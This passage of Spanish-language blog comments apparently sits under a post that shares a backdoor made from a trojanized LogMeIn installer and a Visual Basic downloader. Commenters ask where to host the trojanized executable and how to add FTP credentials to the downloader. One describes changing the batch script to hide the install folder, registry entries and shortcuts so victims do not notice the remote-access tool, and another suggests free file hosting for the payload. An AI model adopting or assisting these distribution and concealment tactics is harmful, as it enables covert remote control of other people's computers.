    Lord, acabo de probar el Downloader en VB y anda baaaaarbaro!!! ahora una pregunta, no logro conseguir un hosting gratuito que hostee archivos .exe que tengan el tamaño del logemin troyanizado??? tenes algun dato para darme??? otra opcion es subirlo a mi ftp pero para ello en el Downloader en VB deberia poner user y pass para acceder al archivo en mi ftp en donde se agrega esa linea en el Downloader??. Gracias!!

  77. Niedmann   •  

    Hola
    Descargue tu backdoor, dejame decirte, super interesante! he estado haciendo algunas modificaciones al batch para eliminar algunas pistas de que el logmein esta instalado, como ocultar la carpeta de instalacion, eliminar otras llaves en el registro que hacian aparecer el programa (bueno, al menos inutilizar la instalacion) ahora mismo estoy tratando de hacer una linea mas que elimine un acceso directo que se crea en documents and settings/all users/inicio/programas/logmein.lnk, ahi voy peleando porque no me lo permite 🙂
    Quisiera tener contacto con vos, para que ayudes a iluminar mi camino 🙂

    Gracias por compartir tus conocimientos!

    • Lordblacksuca   •     Author

      Hola, podes contactarme por FB o twitter, los links estan a la derecha de mi blog.

  78. d03x   •  

    Les recomiendo como FTP el Dropbox es un servicio nuevo para compartir archivos por enlace te da 2 gigas de almacenamiento gratis.
    me gustaria saber si hay otro downloader que pueda modificar desde el block de notas al que solo le cambie la url de descarga que no tengo instalado el VB ahorita.
    que me sugieres lord?

Leave a Reply

Your email address will not be published. Required fields are marked *